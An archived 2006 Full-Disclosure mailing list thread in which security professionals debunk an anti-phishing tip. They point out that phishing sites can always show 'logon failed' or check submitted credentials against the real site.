lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri Mar 31 15:32:09 2006
From: ross.thomson at capgemini.com (Thomson, Ross)
Subject: [HV-PAPER] Anti-Phishing Tips You Should
	NotFollow


I have seen one phishing site which did exactly that-

It tried to login to the real site with the credentials you supplied;  if it
returned a successful login, the userid/password was logged. If it returned
a 'access denied' the userid/password was not logged.


________________________________________________
Ross Thomson | Capgemini | Southbank
Anti-Virus Content Management | Outsourcing
Int: 700 3621 | Ext: + 44 (0)870 904 3621
ross.thomson@...gemini.com | www.capgemini.com
95-97 Wandsworth Road, London. SW8 2HG

Join the Collaborative Business Experience
________________________________________________


-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Jasper
Bryant-Greene
Sent: 31 March 2006 09:11
To: Marcos Ag?ero
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] [HV-PAPER] Anti-Phishing Tips You Should
NotFollow

Marcos Ag?ero wrote:
> Michal Zalewski escribi?:
>> On Fri, 31 Mar 2006 michaelslists@...il.com wrote:
>>
>>> If the website then presents you with the "Logon failed" page, you
>>> are possibly on a legitimate website, so you may proceed with
>>> logging in using your correct credentials. If it gets you right
>>> through - it is definitely a phishing attempt.
>> Note to self: design my next phishing website to always display
>> "logon failed".
> Just as most of the phishing sites already do.

Really? I thought they somehow magically knew enough about you to sign you
in properly and display all the correct details ;)

Seriously though, it wouldn't be that hard to forward the POST on to the
real bank website, would it?

--
Jasper Bryant-Greene
General Manager
Album Limited

http://www.album.co.nz/     0800 4 ALBUM
jasper@...um.co.nz          021 708 334

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

This message contains information that may be privileged or confidential and is the property of the Capgemini Group. It is intended only for the person to whom it is addressed. If you are not the intended recipient,  you are not authorized to read, print, retain, copy, disseminate,  distribute, or use this message or any part thereof. If you receive this  message in error, please notify the sender immediately and delete all  copies of this message.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ